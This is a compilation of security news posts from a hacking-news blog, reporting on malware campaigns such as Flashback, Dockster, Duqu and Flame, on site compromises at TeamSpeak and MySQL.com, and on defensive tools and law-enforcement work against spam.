Microsoft Discovered a New Malware Targeting Apple OS X Exploiting Office Vulnerability

Microsoft Discovered a New Malware Targeting Apple OS X Exploiting Office Vulnerability

This year is going bad to worse for MAC users. Earlier we have seen more than 600,000 Mac user infected by Flashback Trojan after this one another Mac Trojan "Backdoor.OSX.SabPub" penetrated mac security. Recently Microsoft has detected a new piece of malware targeting Apple OS X computers that exploits a vulnerability in the Office productivity suite patched nearly three years ago. The malware is not widespread, according to Jeong Wook Oh of Microsoft's Malware Protection Center. But it does show that hackers pay attention if it's found people do not apply patches as those fixes are released, putting their computers at a higher risk of becoming infected.

The exploit discovered by Microsoft doesn't work with OS X Lion, but does work with Snow Leopard and prior versions. Oh wrote that it is likely attackers have knowledge about the computers they are attacking, such as the victim's operating system version and patch levels. The malware delivered by the exploit is written specifically for OS X and is basically a "backdoor," or a tool that allows for remote control of a computer. Microsoft advised those who use Microsoft Office 2004 or 2008 for Mac or the Open XML File Format Converter for Mac to ensure those products have applied the patch.

-Source (Computer World)  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Discovered a New Malware Targeting Apple OS X Exploiting Office Vulnerability"https://www.voiceofgreyhat.com/2012/05/microsoft-discovered-new-malware.html</a>

USB Immunizer: Anti-Malware Tool Against Autorun Viruses!

The USB immunizer is BitDefender’s response to this growing issue.
Autorun-based malware has been atop of the worldwide e-threat landscape, with notorious representatives such as Trojan.AutorunInf, the Conficker worm (Win32.Worm.Downadup) or Worm.Autorun.VHD. Have to agree on that, many of us get infected buy some silly malware simply by plugin in our friends or neighbours USB , DVD etc.

Introduced back in the Windows XP era to facilitate software installations from CD-ROM media for non-technical computer users, the Autorun feature has rapidly become the infection vector of choice for cyber-criminals.
The Immunize option allows you to immunize your USB storage device or SD card against infections with autorun-based malware. Even if your storage device has been plugged into an infected computer, the piece of malware will be unable to create its autorun.inf file, thus annihilating any chance of auto-launching itself.
The Immunize Computer slider allows you to toggle the autorun feature On or Off for any removable media (except for CD/DVD-ROM devices). If you accidentally plug in an infected USB drive that has not been immunized, the computer will not auto-execute the piece of malware located on the USB storage device.
Download USB Immunizer here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">USB Immunizer: Anti-Malware Tool Against Autorun Viruses!"https://www.voiceofgreyhat.com/2011/05/usb-immunizer-anti-malware-tool-against.html</a>

Security experts can't verify Iran's claims of new worm

 

Without a sample of the new worm that an Iranian official says attacked the country's computers, it's impossible to verify his claims, a security researcher said Monday.

Kevin Haley, the director of Symantec's security response group, said that his team has not found an example of the worm, dubbed "Stars" by the Iranian military commander responsible for investigating Stuxnet, the sophisticated malware that attacked the country's uranium enrichment facilities beginning in June 2009.

"Generally, samples [of malware] do get traded among security vendors," said Haley, explaining that when one antivirus company lacks malware it wants to analyze, it asks other firms to share their samples. "[Iran'] makes this a little more difficult, because we have no direct relationships there," added Haley. "But perhaps someone else does."

Although Symantec has asked researchers in other companies if they have a sample, as of late Monday it has not been able to acquire one.

No other security vendor has stepped forward to say it has a copy of Stars.

Security experts need the malware to corroborate claims by Brigadier Gen. Gholam Reza Jalali, the head of Iran's Passive Defense Organization, the military unit that defends the country's nuclear program.

On Monday, Jalali told Iran's Mehr News Agency that the Stars worm had been detected and thwarted, but provided no information on its function or targets, or when it was discovered.

Jalali's claim came just a week after he blamed Siemens for helping U.S. and Israeli teams create Stuxnet.

Stuxnet, which targeted industrial control systems manufactured by Siemens, has been called a "groundbreaking" piece of malware because it used multiple "zero-day" vulnerabilities, hid while it wreaked havoc on Iran's uranium enrichment hardware, and required enormous resources to create.

It's possible that Stars was not a targeted attack aimed at Iran, but simply part of a more traditional broad-based assault, said Haley.

"It could be a mass attack that got through their defenses," he said. "That could have raised the alarm. They're already paranoid about attacks."

Symantec sees millions of threats every day, the vast majority of which are not targeted, Haley said.

If that's the case, trying to identify Stars would be impossible. "In the case of Stuxnet, we actually had samples, we just didn't understand the significance of the threat until later," Haley said. "Finding [Stars] in our database would be like finding a needle in a haystack" without more information from Iran.

"And even if we found something, we wouldn't know if it was the one they're talking about," said Haley.

Other antivirus vendors, including Helsinki-based F-Secure and U.K. securitycompany Sophos, also acknowledged that they could not verify Iran's claims.

"We can't tie this case to any particular sample we might already have," admitted Mikko Hypponen, F-Secure's chief research officer, in a blog post Monday. "We don't know if Iran[ian] officials have just found some ordinary Windows worm and announced it to be a cyber war attack."

Graham Cluley, a senior security technology consultant at Sophos, also said his company had not been able to identify the malware.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Security experts can't verify Iran's claims of new worm"https://www.voiceofgreyhat.com/2011/04/security-experts-cant-verify-irans.html</a>

'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website

'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website

Researcher at F-Secure blog has identified that A new piece of malicious software targeted at Apple users has been found on a website dedicated to the Dalai Lama. According to blog post by F-Secure -the website related to Dalai Lama is fully compromised and is pushing new Mac malware, called Dockster, using a Java-based exploit. Dockster tries to infect computers by exploiting a vulnerability in Java, CVE-2012-0507. The vulnerability is the same one used by the Flashback malware, which first appeared around September 2011 and infected as many as 600,000 computers via a drive-by download. Flashback was used to fraudulently click on advertisements in order to generate illicit revenue in a type of scam known as click fraud. Apple patched the vulnerability in Java in early April and then undertook a series of steps to remove the frequently targeted application from Macs. Apple stopped bundling Java in the 10.7 version of its Lion operation system, which continued with the company's Mountain Lion release. In October, Apple removed older Java browser plug-ins in a software update.

But still the matter of relief is that current versions of OS X are not vulnerable; users who have disabled the Java browser plug-in are also not vulnerable. F-Secure researcher Sean Sullivan said Dockster is “a basic backdoor with file download and keylogger capabilities.” Meanwhile F-Secure’s Sullivan, also said that the Dalai Lama’s site is also serving a Windows-based exploit for CVE-2012-4681, the Agent.AXMO Trojan. The Trojan exploits a Java vulnerability that allows remote code execution using a malicious applet that is capable of bypassing the Java SecurityManager. 

Please Note That: The gyalwarinpoche.com site doesn't seem to be as "official" as dalailama.com

While talking about Mac malware, then you must remember that earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten"targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal information. In the very decent past we have seen a trojan named 'BackDoor.Wirenet.1'  apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like Chrome, Chromium,Firefox and Opera. For any kind of cyber updates and infose news, stay tuned with VOGH.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website"https://www.voiceofgreyhat.com/2012/12/Dockster-Mac-Malware-Found-on-Dalai-Lama-Related-Website.html</a>

Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec

Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec

We are very much familiar to see Malware has targeted men by enticing them to view videos or pictures of a sexually-oriented nature. But here the story is totally different, recently Antivirus firm Symantec has discovered discovered 'Android.Loozfon' a rare example of malware that targets female Android users.

According to the symantec official blog -A group of scammers is attempting to lure female Android users in Japan into downloading an app by sending emails stating how the recipient can easily make some money. The email includes a link to a site that appears to be designed to assist women to make money simply by sending emails. When a certain link on the site is clicked, Android.Loozfon is downloaded onto the device. Other links direct the user to a dating service site that likely attempts to charge money to use the service, which supposedly helps women meet rich men.

If this trick does not work, the criminal group has another trick up its sleeve. It also sends spam that states that the sender of the email can introduce the recipient to wealthy men. When the link included in the body of the email is clicked, the malware is automatically downloaded onto the device. The downloaded app is titled “Will you win?” in Japanese. It has nothing to do with earning extra income or wealthy men.

If the app is installed and launched, it counts down from two to zero and then states that the user has lost. The app is programmed to lose every time, although there is nothing to either lose or win. It steals contact details stored on the device as well as the phone number of the device, which is the main goal of the malware. The scammers are likely harvesting email addresses in order to send spam to the contacts they were able to steal to lure them to the dating service site and/or sell the data to another group of spammers.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec"https://www.voiceofgreyhat.com/2012/08/Android-Malware-Loozfon-Targeting-Female-Android-Users.html</a>

Russian Hacker Behind Cyber Attack on Georgia Caught on His Webcam

Suspected Russian Hacker Behind Cyber Attack on Georgia Caught on His Webcam 

It said that there may be hundred ways to commit crimes but there are chances of one hundred and one times to get busted. Exactly the same things happened for a Russian hacker who was behind the cyber attack against the country of Georgia. Since 2011 Georgia is blaming that few Russian hackers are disturbing their cyber space while attacking its computer networks, injecting malicious code into websites, and planting spyware to steal classified information. After discovering that a cyber-spy was infecting government computers with malware designed to mine important documents, government officials decided to fight fire with fire. They intentionally allowed the malicious software to infect one particular computer, and baited it with a ZIP file called “Georgian-Nato Agreement” — exactly the sort of thing they knew the intruder would be looking for. Instead of important documents, however, the bait file was loaded with the hacker’s own malware. Once the hacker downloaded and opened the file, the software went to work stealing his documents and, best of all, hijacking his webcam to capture clear video of his face. According to the CERT-Georgia report, an analysis of the attack's command-and-control center revealed that at least 390 computers were infected in the attack. 70% of compromised PCs were based in Georgia, with other victims found in the USA, Canada, Ukraine, France, China, Germany and Russia. Computers hit in Georgia were predominantly based in government agencies, banks and critical infrastructure the report claims. 

In a 27 page report, the Georgian government explains in details that, how in early 2011 Georgian news websites were hacked in order to exploit vulnerabilities, and spread malware that hijacked infected computers and searched for sensitive documents. 

According to report by Naked Security- Georgian officials lay a trap. Georgia's CERT deliberately infected one of its own PCs with the malware, and planted a ZIP file named "Georgian-Nato Agreement" on its drive, hoping it would prove irresistible for the hacker. Sure enough the hacker stole the archive file and ran malware that Georgia CERT had planted inside, meaning that now investigators had control over the hacker's own computer. This made it relative child's play to capture images of the suspect at work in front of his PC. The CERT researchers claim that they also found a Russian email conversation on the suspect's computer in which he gives instruction on how to use his malware and infect targets. Furthermore, the suspected hacker's city, ISP, email address and other information were also acquired. Curiously, a domain used by the attackers was registered to an address in Moscow belonging to the Russian Ministry of Internal Affairs, department of logistics - which just happens to be based close to the Russian Secret Service (FSB). Furthermore, according to CERT-Georgia, websites used to control the infected Georgian computers have links with RBN, the notorious Russian Business Network.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Russian Hacker Behind Cyber Attack on Georgia Caught on His Webcam"https://www.voiceofgreyhat.com/2012/11/Russian-Hacker-Caught-on-His-Webcam.html</a>

TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit

TeamSpeak Official Forum Hacked! Infecting Users By Malicious DotCache Exploit Kit

A serious security breach has compromised official forum of TeamSpeak, according to sources hackers have gained access inside the server and injected malicious script into the landing page of TeamSpeak official forum. Expert malware analyzer have figured out that the attack was thoroughly planned in order to infect millions of users while redirecting them to a DotCache exploit kit landing page as illustrated below 

TeamSpeak is a very famous Brazilian company who offers (VoIP) software that allows computer users to speak on a chat channel with fellow computer users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice, from there they can join chat channels and enjoy the excellent VoIP service. Mostly it is used by millions of gamers across the globe. 

Basically we can consider TeamSpeak is a high value target, so did the hacker. Researchers said that the exploit kit landing page is hosted on atvisti.ro, a forum for ATV enthusiasts that's also been compromised. In a statement well known malware analyst & security researcher Jerome Segura said- if the Java exploit succeeds the final payload is loaded. In this particular example, the payload was the Zero Access Trojan which an Anti-Malware from Malwarebytes detects as Rootkit.0Access. The matter of a bit relief is that the malware has not yet been spotted in the wild. According to a statistic by Virus Total, only 7 of 46 leading antivirus can detect this type of malware. Exactly like TeamSpeak, a few days earlier Kahu Security researchers uncovered a similar compromise on the forum for the Nissan Pathfinder Off Road Association (NPORA) in both cases, JJEncode was used to obfuscate the malicious script. To avoid further infection, TeamSpeak forum has already been informed, an as expected they have over come this issue. For detail analysis of the above said malware you can visit official blog post of Malwarebytes. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit"https://www.voiceofgreyhat.com/2013/12/TeamSpeak-forum-hacked.html</a>

The Nitro Attacks Stealing Secrets from the Chemical Industry

Symantec prepares a a report on the ongoing malware report and named it "Nitro Attacks". By using this an attacker can pull secretes information from chemical industries, companies, the attack is mainly based on social engineering. 

An Analysis report is Saying:-

This "nitro" attack has an interesting blend of malware techniques that does show some ingenuity. It used a socially engineered email message with a malicious attachment. While the malware component of the attack was a recycled version of the common remote access Trojan (RAT) PoisonIvy, it was often packaged in an encrypted archive to evade email gateway detection. Nitro portrayed itself as a necessary Adobe Flash or anti-virus update, using your desire to be secure to trick you into installing the malware. Like many other targeted attacks that have come to light recently, this one attacks our weakest link, our humanity.
One of the behaviors of the Trojan was to collect password hashes from compromised Windows computers. If you haven't already gotten the memo, it is an extremely bad idea to give your users administrative rights.
Malware cannot access the Windows cache of passwords, which almost always has admin credentials included, if it does not have administrative rights. Simply restricting permissions would be enough to stunt the spread of an attack like this. Additionally, the behavior of this malware is quite easy for HIPS or behavioral anti-virus to detect and block. With the multitude of techniques being used by the bad guys, analyzing the behavior of applications is critical.
The command and control for this Trojan was located on a virtual hosted server in the United States. Symantec's investigation shows that the person who owns this instance, Covert Grove, is based in the Hebei region of China. In too many high profile organizations, IT security and their users have an adversarial relationship. Additionally, IT often does not use the full capabilities of the tools they are purchasing out of fear of false positives. Blocking suspicious attachments, using proactive detection technologies and educating users could all stop this type of attack from succeeding. If you weren't one of the victims, this is a great lesson on what you should be doing to protect against the next attack.

For more info & to download the symantec report click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">The Nitro Attacks Stealing Secrets from the Chemical Industry"https://www.voiceofgreyhat.com/2011/11/nitro-attacks-stealing-secrets-from.html</a>

Duqu, The Next-Generation Cyber Attack Weapon

Researchers found an alarm for a new piece of malware with “striking similarities” to Stuxnet, the mysterious computer worm that targeted nuclear facilities in Iran. The new malware, identified as Duqu, is a highly specialized Trojan capable of gathering intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party.

“The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility,” according to Symantec’s security response team. 

Symantec said it got a copy of the in-the-wild malware from an unnamed research lab with strong international connections. The company found that parts of Duqu are “nearly identical to Stuxnet” but noted that the malware has a completely different goal.

Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created after the last recovered Stuxnet file. Duqu’s purpose is to gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party. The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility.

The company said Stuxnet and Duqu shared the same modular structure, injection mechanisms, and a driver that is digitally signed with a compromised key. Unlike Stuxnet, Symanted said the new malware does not contain any code related to industrial control systems.  It was built to be a  remote access Trojan (RAT) that does not self-replicate.

“The threat was highly targeted toward a limited number of organizations for their specific assets. However, it’s possible that other attacks are being conducted against other organizations in a similar manner with currently undetected variants,” Symantec warned.

The attackers used Duqu to install another infostealer that could record keystrokes and gain other system information. The attackers were searching for assets that could be used in a future attack. In one case, the attackers did not appear to successfully exfiltrate any sensitive data, but details are not available in all cases. Two variants were recovered and, in reviewing our archive of submissions, the first recording of one of the binaries was on September 1, 2011. However, based on file compile times, attacks using these variants may have been conducted as early as December 2010.

Noted that Duqu uses HTTP and HTTPS to communicate to a command and control server which is currently operational.

To know more about Duqu and to see the similarities between Stuxnet and Duqu Click Here

-News Source (ZD net, Yahoo, Symantec) 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Duqu, The Next-Generation Cyber Attack Weapon"https://www.voiceofgreyhat.com/2011/10/duqu-next-generation-cyber-attack.html</a>

An army of techies waging war on spam

It's a vast, invisible battle, going on all the time - and, unbeknownst to you, your computer may be one of the battlegrounds.
The struggle pits thousands of smart, evil folks, who send out trillions of pieces of spam e-mail, against the people in law enforcement and business guarding against them and trying to shut them down.
On the front lines against spam and cybercrime, some analyze malicious computer code (malware), and others - in the young science of cyberforensics - examine computers and drives confiscated in investigations.
Spam - hated word - is again in the news. A May 3 FBI alert warned of e-mail carrying purported images or videos of Osama bin Laden. "This will leave you speechless)," the spam says. "See picture of bin laden dead!"
Don't even open it, warned the alert. "This malicious software or malware can embed itself in computers and spread to users' contact lists, thereby infecting the systems of associates, friends, and family members."
Pumped out by networks (botnets) of malware-enslaved personal computers, unwanted e-mail - random junk, ads, porn, viruses, Trojan horses, get-rich-quick offers from Nigerian nobility - makes up most of all e-mail sent in the world. By far. Estimates range around 80 percent - but a 2007 Microsoft security report in October put it at 97 percent. It ranges from crud to criminal. As for malware, the United States has about 2.2 million computers (more than any other country) infected, according to Microsoft numbers (likely to be low).
"I guarantee," says FBI Special Agent Brian Herrick, director of the FBI Cyber Crime Squad in Philadelphia, "that thousands of Inquirer readers probably have computers infected with spam or malware, part of a botnet just pumping out spam."
The cyberthugs have an advantage, says Special Agent Cerena Coughlin, also of the Cyber Crime Squad. "We can stop them for a while, but they always come up with ways to circumvent it. And we're more restricted. We have to follow the letter of the law - they don't."
The extent of it is staggering. Before U.S. marshals took it down in March, the Rustock botnet was pumping out an estimated 30 billion spam e-mails a day. The botnets - big names include ZeuS, SpyEye, Dogma, Koobface, and Alureon - are run by criminal groups that use servers and supercomputers in several countries. Tracing their activity is extremely difficult and calls for highly skilled technical workers.
One of 16 such FBI squads in the country, the Philadelphia Cyber Crime Squad has 15 agents working full-time on cybercrime; the national program began in 1996. Working with national and international agencies, the squad studies and traces viruses, junk, and spam. Cases involve computer intrusions (everything from local hackers to international cyberespionage and terrorism), child exploitation (as in pornography), intellectual-property rights (copyright infringement, movies, music, software, proprietary business secrets), Internet fraud, and identity theft.
Coughlin says, "We are insanely busy. This is the third-busiest squad in the country, because of where it is and all the affected business and government concerns nearby. We don't have enough bodies for all the work there is."
In the Philadelphia area, the FBI joins hands with local businesses such as banks, agribusiness, and utilities (enterprises often attacked by spam and cybercrime) in a group called InfraGard. There are more than 1,400 local members - "So many people want to be part of it that we don't even need to solicit members," Coughlin says.
At monthly meetings, members share information, news, and tips. The FBI gives presentations and talks, and individual members speak about the cases they face. "It's a communication channel," Herrick says, "between the U.S. government and people in industry down in the trenches, looking to protect critical infrastructure."
Current president of the local chapter of InfraGard is Brian Schaeffer, chief information officer of Liberty Bell Bank in Marlton. He says, "I get thousands of cyberattacks a day. A lot of them are idiots just wanting to show what they can do. But a lot of them are looking to access banking information."
Like most banks, Liberty Bell has a strong firewall, "so hackers take a back-door approach," sending bank clients "phishing" e-mails - which pretend to be trustworthy communications but hide nasty intentions. "If a client even opens such an e-mail, they can get into their account information, their contacts, the keys to the kingdom."
Such attacks mean that "not only do I have to defend my own system, but also I try to help the customers with theirs. If their computers get infected, their account and credit information could get sold to strangers, and that could hurt us all." Schaeffer tells of an elderly couple who came to his bank one day, and just by coincidence, a bank clerk brought him a suspicious request "to withdraw a huge amount of money from their account - but there they were, sitting with us, so we knew some hackers had got at their information through e-mail."
He says InfraGard "has given me a network of people I can go to if I see things I never saw before. If I have a question, there's likely to be someone with an answer."
The other side of the battle is cyberforensics. Think of it as CSI with computers. It's happening right now, with the cache of computers, flash drives, and other cyberstuff taken from Osama bin Laden's compound in Abbottabad, Pakistan. U.S. agents instantly began to analyze this precious trove for criminal evidence - and links to other al-Qaeda operatives.
Work much like this goes on in Radnor at the FBI's Regional Computer Forensics Laboratory, one of 16 such labs in the country. As with InfraGard, the flavor is distinctly federal/local. Law enforcement agencies - such as the police departments of Philadelphia, Lancaster, Lower Merion, and Lower Providence - send officers to guest-work at the lab and receive training and experience in fighting computer crime.
Supervisory Special Agent J.P. McDonald directs the lab, which has been involved in some of the highest-profile local investigations of recent years, including the 2007 Fort Dix attack plot, the manhunt for the Coatesville arsonists, the case of former State Sen. Vincent J. Fumo, and the 2007-08 "Bonnie and Clyde" case of Jocelyn Kirsch and Edward Anderton, now in prison for fraud and identity theft.
"You can track the growth of cyberforensics along the same timeline as computers," McDonald says. "The FBI's program began in 1999, and, as of the mid-2000s, cyberevidence now has recognition and a firm track record in courts."
The lab is a techie's paradise, with gadgets and screens galore, racks of digital evidence sealed in antistatic wrap, sophisticated hard-drive readers, radiofrequency-shielded spaces, and kiosks for quick analysis of cell phones and thumb drives. "The majority of what we do," McDonald says, "is analysis of what's in a machine, how it got there, and then making a timeline of the history of what got there when."
"People's electronic devices are really an extension of their thoughts," says Philadelphia Police Lt. Edward Monaghan, deputy director of the lab. "If you're into NASCAR, you're likely to have NASCAR stuff in your computer. Thugs who are into drugs and money like to have their pictures taken with drugs, guns, and money. It sounds dumb, but they love it. That's what cyberevidence is all about."
The FBI's Herrick is resigned to a long battle: "There's probably some high school kid someplace in the Midwest - or maybe Europe or Asia someplace - who's cooking up something nobody's ever seen before. You really have to stay on your game with these guys."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">An army of techies waging war on spam"https://www.voiceofgreyhat.com/2011/05/army-of-techies-waging-war-on-spam.html</a>

The World's Safest Browser: BitBox

There is no such thing as an entirely secure browser. Let's be realistic: You will always need a good portion of common sense and Internet smarts to avoid nasty attacks hijacks.

However, if you are paranoid about security, there is one browser that will reliably protect you from virtually all threats. It's a browser you already know: Firefox 4.0.1. Well, a boxed version of Firefox 4.0.1.
I am not exactly an adventurous Internet user as far as the dark corners of the web are concerned. Just I am not the kind of person to enjoy the silence in a dark alley in Chicago's south suburbs after dawn, I typically avoid websites I don't generally trust. I have had my fair share of spyware, trojans and other malware that caused me quite a bit of headache in the past and I am just more cautious than I was 10 years ago. Yet, that might change. I have just discovered a bulletproof wrapper for Firefox and, at least for now, I don't care that much anymore what is happening below the content the browser shows. There might be lots of malware and I really don't care anymore.
The reason is that I have started using BitBox as my browser for my general work-related tasks. BitBox is essentially a heavily armored version of Firefox 4.0.1 that is encased in Oracle's VirtualBox virtual machine (VM) environment that houses a secured Debian 6 Linux OS. That sounds relatively complicated, but once it is installed, this secure version of Firefox works just like a regular version of the browser. The difference is that it runs in a virtualized environment that is separate from your Windows XP/Vista/7.

The upside clearly is that you are dealing with a self-contained package. If you click on malicious malware, the usual EXE files cannot be executed in your Linux VM. You can download files, but they will not explicitly affect your Windows system and need to be manually moved out of the VM, if you have connected the drives. malware that infects Firefox during your session is automatically deleted the next time you start BitBox, as it always starts with its default configuration in the way it was installed. However, phishing attacks that target your personal data and may trick you in providing critical information will still require some common sense not to do so and will not protect you from the effects of such actions.
There are a few downsides. First, it is a hefty 990 MB download and the installed software will require almost 2 GB of space, as there is a need for Oracle's VirtualBox that is included in the package as well as a Debian 6 installation. Since the software is set back to a default level at every time it starts, it is not the most convenient browser to be used on an every day basis for the consumer. The deal breaker is its language. The software was developed for the German government and while it is available as a free download, it is only available in German. Unless you have basic knowledge of German, the installation will be a hurdle too high to overcome and even then it may be rather uncomfortable to be generally used.
The installation of the entire package is documented via PDF file and is somewhat straight forward, but some knowledge about virtual machines and virtualization in general does help when the individual components of the software are installed. In the end, you really want to know what is happening on your PC and you would want to know what effects a configured virtual drive on your PC has. Other than that, I was able to install BitBox within 15 minutes, once it was downloaded. The only criticism I would have is that developer Sirrix is not using the most recent version of Oracle's Virtual Box software (4.04 vs. 4.06). Custom configuration options include a specific download folder as well as a separate malware scanner as well as random root passwords for the virtual machine and proxy settings. During the installation, the software installs a Linux guest (Firefox) inside Virtual Box. Typically you would run the software form within VirtualBox, but Sirrix has managed to trim down the entire process to a single icon on the desktop.
I briefly mentioned it - this is not a browser to get deeply emotional about and discuss its performance features, but the concept is very compelling as far as browser safety is concerned. Plain browsing tasks make a lot of sense in such a package. In fact, I wonder, why such versions aren't offered by Mozilla and Google as well as Opera and Microsoft by default. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">The World's Safest Browser: BitBox"https://www.voiceofgreyhat.com/2011/05/worlds-safest-browser-bitbox.html</a>

USA Accused For Planting "Flame" Malware to Hack France President's Network

USA Accused For Planting "Flame" Malware to Hack France President's Network

A well known French newspaper named "L'Express" has accused that United States is using dangerous cyber weapon "Flame" to break into the computer networks inside France’s presidential palace also known as the Elysee. In his report L'Express has published details of what it claims was a sophisticated state-sponsored hack into the offices of the French presidency earlier this year with the intention of stealing data. According to the newspaper, the malware attack took place in May 2012, shortly before the second round of presidential elections in France, but has been kept secret until now. The newspaper alleges that the attackers reportedly found their targets on Facebook, identifying people working inside the presidential palace and connecting with them on the social network. The social engineering laid the groundwork for the next phase of the attack; the victims were then sent links to a fake Elysee intranet page where their login credentials were stolen. Workers at the Élysée Palace are said to have been befriended on Facebook by hackers, who then sent their victims a link to what purported to be a login page for the Élysée intranet site. In this way, it's claimed, login credentials were stolen. It is alleged that malware was then installed on the network, infecting computers belonging to senior political advisors, including Xavier Musca, Secretary-General of Nicolas Sarkozy's office. The United States Embassy in Paris has denied any involvement in hacking its ally. “We categorically refute allegations of unidentified sources,” Mitchell Moss, Embassy spokesman, told l’Express. “France is one of our best allies. Our cooperation is remarkable in the areas of intelligence, law enforcement and cyber defense. It has never been so good and remains essential to achieve our common fight against extremist threat.” Though the secretary  of Department of Homeland Security Janet Napolitano did not deny the U.S. was involved. She told l’Express: “We have no greater partner than France, we have no greater ally than France. We cooperate in many security-related areas. I am here to further reinforce those ties and create new ones.”

While talking about Flame, we would like to remind you that after the episode of 'Duqu'; In the middle of this year The Iranian Computer Emergency Response Team (MAHER) claims to have discovered a new targeted Stuxnet attacking the country's internal system. This newly found Stuxnet have been dubbed Flame (also known as Flamer or Skywiper). Flame the next generation cyber weapon which is also known as 'The Super Spy' has already fascinated the cyber-security industry with its sophistication and versatility as a Swiss-Army knife of cyber-spying. Later it was spotted in the wild when software giant Microsoft confirmed that its Windows Server Update Services (WSUS), Windows Update (WU) has been infected by Flame malware. Also in many fields, the name of 'Flame' was on the high node. 

-Source (NS & threatpost)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">USA Accused For Planting "Flame" Malware to Hack France President's Network"https://www.voiceofgreyhat.com/2012/11/USA-Accused-For-Planting-Flame-to-Hack-France.html</a>

MYSQL.com Compromised & Giving Malware Warning

MYSQL.com compromised and giving malware warning to the visitors. MySQL is one of the most widely used RDBMS you will find 6 out of 10 websites are usingd using MySQL. Mysql.com was also hacked earlier due to SQL injection vulnerability on their website. According to a blog post at Armorize, Mysql.com has been hacked and is currently serving malware. Armorize had detected the compromise through its website malware monitoring platform HackAlert, and has analyzed how the compromise of the site’s visitors unfolds. The mysql.com website is injected with a script that generates an iFrame that redirects the visitors to http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted.

According to The Researcher:-
“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java,), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,”
Here is a video Released By Armorize to show you the Reality:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">MYSQL.com Compromised & Giving Malware Warning"https://www.voiceofgreyhat.com/2011/09/mysqlcom-compromised-giving-malware.html</a>

2011 "The Year of The Hack" A Brief Over View & Prediction of 2012

Everyday when you open voiceofgreyhat.com you see lost of hacks, defacement, data breached, server rooted, database hacked, information leaked and so on and on. Here is some summary where all the recent attacks ware covered. If 2011 was “the year of the hack,” as it was dubbed by Richard Clarke, former White House cyber-security czar

Would 2012 be the year enterprises apply the lessons learned and stop the attacks? 
Apparently not, as security experts are predicting even more sophisticated attacks for 2012. 

Defense contractors, government agencies, and other public and private organizations reported network breaches where attackers stole intellectual property, financial data and other sensitive data. Hacktivist groups such as Anonymous and LulzSec demonstrated how much damage they can cause large organizations by employing fairly well-known techniques against the application layer. 

What’s the security outlook for 2012? 

It’s appears gloomy, as security experts warn that cyber-attackers will target applications, mobile devices and social networking sites. There will be more social engineering as attackers research victims beforehand to craft even more targeted attacks.

2011 was a year in transition, David Koretz, CEO of Mykonos Software, told, the year when sophisticated Web application attacks came of age. Before, people were talking about the threat to Web applications but were unable to quantify the problem. “2011 is the year people started caring about Web security for the first time,” Koretz said

Attackers targeted applications through SQL injection and cross-site scripting attacks to get access to sensitive data, said Lori MacVittie, senior technical marketing manager at F5 Networks. There are more kits and exploit tools released that exploit certain vulnerabilities, making it easier for even less skilled attackers to launch sophisticated attacks. There will be more of these tools in 2012, she said.

Social media has become more ubiquitous. Forrester estimated 76 percent of enterprises allow some access to social networking sites from within the corporate networks,  and 41 percent allow “unfettered access” to these sites. Many of the data breach and cyber-attack headlines in 2011 were social engineering attacks that exploited email and the Web as an attack vector, according to Rick Holland, a Forrester analyst.

Attacks against social network sites accounted for only 5 percent of total social engineering attacks in Verizon’s 2011 Data Breach Investigations Report. Forrester expects this number to “increase significantly” in 2012, Holland said.

Malware for mobile platforms grabbed headlines in 2011, starting with Google removing apps infected with DroidDream malware from Android Market and then remotely removing them from user devices.

Malware developed for mobile platforms exploded in volume and sophistication, according to Juniper Networks’ Global Threat Center. Criminals released a mobile version of the Zeus Trojan designed to intercept security controls used for online banking for several mobile platforms. Many users were infected with malware that turned their smartphones into zombies participating in a botnet without their knowledge.

Mobile device adoption is on track to reach 60 million tablets and 175 million smartphones in the workforce by 2012, according to Forrester. The majority of users will not be using these devices secured within the corporate environment as they will be working from home offices, public hotspots and third-party networks.

Organizations will increasingly shift their content security operations to the cloud to better protect mobile users. Security professionals have to adapt quickly to multiple mobile form factors and evolving threats from sophisticated malware and social networks, Holland said. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
